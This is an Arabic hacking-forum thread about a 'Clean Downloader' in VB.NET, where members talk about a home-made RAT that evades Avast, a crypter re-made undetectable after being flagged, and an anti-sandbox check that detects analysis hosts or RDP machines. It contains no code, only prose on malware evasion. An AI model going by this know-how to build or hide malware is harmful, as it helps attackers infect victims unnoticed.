لذلك تجدني غير مهتم كثيرا بالتشفير و خاصة اني لا اخترق
anti Anyrun هيا وظيفتها التحقق من خلال موقع ان الجهاز الذي يعمل عليه السيرفر host للفحص او rdp ام لا حتي نتجنب سحابات الفحص وهذه الاشياء
كل المعلومات موجود في Informations في اول خيار
انشاء الله عن قريب فانا الان اعمل علي مشاريع اخري مطلوبه مني عندما انتهي سوف ادخل علي هذا المشروع
بالتوفيق لك اخي
ارجوا ان لا تنسى تطوير الموضوع.
هل يمكنك اضافة خاصية تغيير مفتاح السوكت
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
لقد طرحت هنا في المنتدي سابقا برنامج اختراق جديد خاص بي و لقد رجعت للعمل عليه مرة اخري
هو يتخطي الافاست بسيرفر خام و التبليغ خارجي
و كذلك طرحت برنامج تشفير كلين في المنتدي و بعدما انكشف ارجعته كلين مرة اخري
لذلك تجدني غير مهتم كثيرا بالتشفير و خاصة اني لا اخترق
لم اكن اعرف انك طرحت برنامج رات خاص بك
ممكن تفيدني برابط الموضوع لتجربته ؟
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
للاسف تعديله معقد جدا ويحتاج اعادة كتابة Functions(%VAR%) من جديد
لا جدوى من اعادة تشفيره . اخذ مني الكثير من الوقت دون فائدة وافضل كتابة برنامج جديدة على تعديله :)
نعم صدقت و المشكلة انك لا تعرف اذا كان يتخطي الدفاع الاستباقي لكافة الحمايات
حب الاطلاع هو من دفعني للتعامل معه و خاصة انه كان برنامج تشفير مشهور
في بعض الاحيان تجد برنامج تشفير صغير افضل بكثير من البرامج الكبيرة و المدفوعة
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
لم اكن اعرف انك طرحت برنامج رات خاص بك
ممكن تفيدني برابط الموضوع لتجربته ؟
لم اتدكر اين يوجد الموضوع لانه قديم و مر عليه زمن طويل
و ربما يكون من بين المواضيع التي تم حدفها من قبل عندما حدث مشكل فقدان البيانات للمنتدي
عندما انتهي منه باضافة خصائص اخري له سوف اقوم بطرحه هنا في المنتدي
فانا مزلت في نقاهة طويلة المدي بسبب الحادث و لم يعد باستطاعتي العمل مثل السابق
وحتي التركيز نقص و قل
المهم السلامة للجميع من كل شر
 

مواضيع مماثلة

أعلى